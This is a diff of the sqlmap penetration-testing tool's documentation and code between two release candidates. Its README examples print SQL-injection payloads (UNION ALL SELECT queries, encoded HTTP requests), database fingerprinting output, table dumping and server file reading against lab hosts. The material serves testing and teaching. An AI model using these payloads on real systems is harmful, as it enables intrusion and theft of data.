<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">File system access</A>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">File system access</A>
</H2>
<H3>Read a specific file content</H3>
@ -2867,8 +2914,8 @@ entries and goes on.</P>
<P>Option: <CODE>--read-file</CODE></P>
<P>If the back-end database management system is MySQL and the current user
has access to the <CODE>LOAD_FILE()</CODE> function, it is possible to read
the content of a specific file from the file system.</P>
has <CODE>FILE</CODE> access (access to <CODE>LOAD_FILE()</CODE> builtin function),
it is possible to read the content of a specific file from the file system.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
@ -2903,7 +2950,7 @@ inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
</P>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Operating system access</A>
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Operating system access</A>
</H2>
<H3>Prompt for an interactive operating system shell</H3>
@ -2941,7 +2988,7 @@ $ exit
functionalities of SQL shell.</P>
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Miscellaneous</A>
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Miscellaneous</A>
</H2>
<H3>Estimated time of arrival</H3>
@ -3199,27 +3246,6 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</P>
<H3>Load options from a configuration INI file</H3>
<P>Option: <CODE>-c</CODE></P>
<P>It is possible to pass user's option from a configuration INI file, an
example is <CODE>sqlmap.conf</CODE>.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Save options on a configuration INI file</H3>
<P>Option: <CODE>--save</CODE></P>

BIN
doc/README.pdf
View File

Binary file not shown.

492
doc/README.sgml
View File

@ -44,10 +44,12 @@ for x86, AMD64 and Itanium too.
Optionally, if you are running sqlmap on Windows, you may wish to install
<htmlurl url="http://ipython.scipy.org/moin/PyReadline/Intro" name="PyReadline">
to be able to take advantage of the sqlmap TAB completion and history
support functionalities in the SQL shell and OS shell.
library to be able to take advantage of the sqlmap TAB completion and
history support functionalities in the SQL shell and OS shell.
Note that these functionalities are available natively by Python official
readline library on other operating systems.
You can also choose to install <htmlurl url="http://psyco.sourceforge.net/" name="Psyco">
library to speed up the sqlmap algorithmic operations.
<sect1>Scenario
@ -308,20 +310,25 @@ $ python sqlmap.py -h
sqlmap/0.6.3 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u "<URL>" | -g "<google dork>" | -c "<config file>"}
Usage: sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
Request:
These options have to be specified to set the target url, HTTP method,
how to connect to the target url or Google dorking results in general.
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab logs
-g GOOGLEDORK Process Google dork results as target urls
-p TESTPARAMETER Testable parameter(s)
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
--method=METHOD HTTP method, GET or POST (default: GET)
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
@ -333,8 +340,10 @@ Options:
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 10)
Injection:
-p TESTPARAMETER Testable parameter(s)
--string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value
@ -345,11 +354,11 @@ Options:
--time-test Test for Time based blind SQL injection
--union-test Test for UNION query (inband) SQL injection
--union-use Use the UNION query (inband) SQL injection to
retrieve the queries output. No need to go blind
--union-use Use the UNION query (inband) SQL injection to retrieve
the queries output. No need to go blind
Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
@ -398,16 +407,15 @@ Options:
Miscellaneous:
--eta Retrieve each query output length and calculate the
estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0)
-v VERBOSE Verbosity level: 0-5 (default 1)
--update Update sqlmap to the latest stable version
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</verb></tscreen>
<sect1>Request
<sect1>Target
<sect2>Target URL
@ -624,7 +632,7 @@ Content-Type: text/html
</verb></tscreen>
<sect2>List of targets
<sect2>Parse targets from Burp or WebScarab logs
<p>
Option: <tt>-l</tt>
@ -677,87 +685,33 @@ want to test this url? [y/N/q] y
</verb></tscreen>
<sect2>Testable parameter(s)
<sect2>Load options from a configuration INI file
<p>
Option: <tt>-p</tt>
Option: <tt>-c</tt>
<p>
By default sqlmap tests all <tt>GET</tt> parameters, <tt>POST</tt>
parameters, HTTP <tt>Cookie</tt> header values and HTTP <tt>User-Agent</tt>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
</verb></tscreen>
<p>
Or, if you want to provide more than one parameter, for instance:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</verb></tscreen>
<p>
You can also test only the HTTP <tt>User-Agent</tt> header.
It is possible to pass user's options from a configuration INI file, an
example is <tt>sqlmap.conf</tt>.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
back-end DBMS: MySQL >= 5.0.0
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<p>
Note that if you also provide other options from command line, those are
evaluated when running sqlmap and overwrite the same options, if set, in
the configuration file provided.
<sect1>Request
<sect2>HTTP method: <tt>GET</tt> or <tt>POST</tt>
@ -1156,161 +1110,100 @@ It is possible to specify a number of seconds to wait between each HTTP
request. The valid value is a float, for instance 0.5.
<sect1>Techniques
<sect2>Test for Time Based Blind SQL injection
<sect2>Seconds to wait before timeout connection
<p>
Option: <tt>--time-test</tt>
Option: <tt>--timeout</tt>
<p>
TODO
It is possible to specify a number of seconds to wait before considering
the HTTP connection timed out. The valid value is a float, for instance
10.5.
<sect2>Test for UNION query SQL injection
<sect1>Injection
<sect2>Testable parameter(s)
<p>
Option: <tt>--union-test</tt>
Option: <tt>-p</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
By default sqlmap tests all <tt>GET</tt> parameters, <tt>POST</tt>
parameters, HTTP <tt>Cookie</tt> header values and HTTP <tt>User-Agent</tt>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
Or, if you want to provide more than one parameter, for instance:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
You can also test only the HTTP <tt>User-Agent</tt> header.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect1>Injection
<sect2>String match
@ -1510,6 +1403,160 @@ back-end database management system. If you do not know it, let sqlmap
automatically identify it for you.
<sect1>Techniques
<sect2>Test for Time Based blind SQL injection
<p>
Option: <tt>--time-test</tt>
<p>
TODO
<sect2>Test for UNION query SQL injection
<p>
Option: <tt>--union-test</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect1>Fingerprint
<sect2>Extensive database management system fingerprint
@ -2183,7 +2230,7 @@ databases tables, only the users' schema that the web application's user
is connected to, which is always <tt>public</tt>.
<sect2>Dump database tables entries
<sect2>Dump database table entries
<p>
Options: <tt>--dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
@ -2281,8 +2328,8 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</verb></tscreen>
<p>
You can also provide the <tt>--start</tt> and/or the <tt>--stop</tt> option
to limit the dump to a range of entries.
You can also provide the <tt>--start</tt> and/or the <tt>--stop</tt>
options to limit the dump to a range of entries.
<itemize>
<item><tt>--start</tt> specifies the first entry to enumerate
@ -2789,8 +2836,8 @@ Option: <tt>--read-file</tt>
<p>
If the back-end database management system is MySQL and the current user
has access to the <tt>LOAD_FILE()</tt> function, it is possible to read
the content of a specific file from the file system.
has <tt>FILE</tt> access (access to <tt>LOAD_FILE()</tt> builtin function),
it is possible to read the content of a specific file from the file system.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
@ -3112,27 +3159,6 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</verb></tscreen>
<sect2>Load options from a configuration INI file
<p>
Option: <tt>-c</tt>
<p>
It is possible to pass user's option from a configuration INI file, an
example is <tt>sqlmap.conf</tt>.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<sect2>Save options on a configuration INI file
<p>

1
doc/THANKS
View File

@ -114,6 +114,7 @@ M Simkin <mlsimkin@cox.net>
Jason Swan <jasoneswan@gmail.com>
for reporting a bug when enumerating columns on Microsoft SQL Server
for suggesting a couple of improvements
Alessandro Tanasi <alessandro@tanasi.it>
for extensively beta-testing sqlmap

5
lib/core/exception.py
View File

@ -74,6 +74,10 @@ class sqlmapNotVulnerableException(Exception):
pass
class sqlmapThreadException(Exception):
pass
class sqlmapUnsupportedDBMSException(Exception):
pass
@ -108,6 +112,7 @@ exceptionsTuple = (
sqlmapUndefinedMethod,
sqlmapMissingPrivileges,
sqlmapNotVulnerableException,
sqlmapThreadException,
sqlmapUnsupportedDBMSException,
sqlmapUnsupportedFeatureException,
sqlmapValueException,

29
lib/core/option.py
View File

@ -28,6 +28,7 @@ import cookielib
import logging
import os
import re
import socket
import time
import urllib2
import urlparse
@ -264,7 +265,7 @@ def __setRemoteDBMS():
def __setThreads():
if conf.threads <= 0:
if not isinstance(conf.threads, int) or conf.threads <= 0:
conf.threads = 1
@ -488,6 +489,29 @@ def __setHTTPCookies():
conf.httpHeaders.append(("Cookie", conf.cookie))
def __setHTTPTimeout():
"""
Set the HTTP timeout
"""
if conf.timeout:
debugMsg = "setting the HTTP timeout"
logger.debug(debugMsg)
conf.timeout = float(conf.timeout)
if conf.timeout < 3.0:
warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
warnMsg += "will going to reset it"
logger.warn(warnMsg)
conf.timeout = 3.0
else:
conf.timeout = 10.0
socket.setdefaulttimeout(conf.timeout)
def __cleanupOptions():
"""
Cleanup configuration attributes.
@ -543,9 +567,11 @@ def __setConfAttributes():
conf.paramNegative = False
conf.path = None
conf.port = None
conf.retries = 0
conf.scheme = None
conf.sessionFP = None
conf.start = True
conf.threadException = False
def __setKnowledgeBaseAttributes():
@ -682,6 +708,7 @@ def init(inputOptions=advancedDict()):
__setConfAttributes()
__setKnowledgeBaseAttributes()
__cleanupOptions()
__setHTTPTimeout()
__setHTTPCookies()
__setHTTPReferer()
__setHTTPUserAgent()

14
lib/core/optiondict.py
View File

@ -25,12 +25,14 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
optDict = {
# Family: { "parameter_name": "parameter_datatype",
"Request": {
# Family: { "parameter_name": "parameter_datatype" },
"Target": {
"url": "string",
"list": "string",
"googleDork": "string",
"testParameter": "string",
},
"Request": {
"method": "string",
"data": "string",
"cookie": "string",
@ -42,18 +44,20 @@ optDict = {
"proxy": "string",
"threads": "integer",
"delay": "float",
"timeout": "int",
},
"Injection": {
"testParameter": "string",
"string": "string",
"dbms": "string",
},
"Techniques": {
"Techniques": {
"timeTest": "boolean",
"unionTest": "boolean",
"unionUse": "boolean",
},
},
"Fingerprint": {
"extensiveFp": "boolean",

6
lib/core/settings.py
View File

@ -30,7 +30,7 @@ import sys
# sqlmap version and site
VERSION = "0.6.3-rc3"
VERSION = "0.6.3-rc4"
VERSION_STRING = "sqlmap/%s" % VERSION
SITE = "http://sqlmap.sourceforge.net"
@ -65,4 +65,6 @@ ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ]
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
TIME_DELAY = 5
# TODO: port to command line/configuration file options?
SECONDS = 5
RETRIES = 3

43
lib/parse/cmdline.py
View File

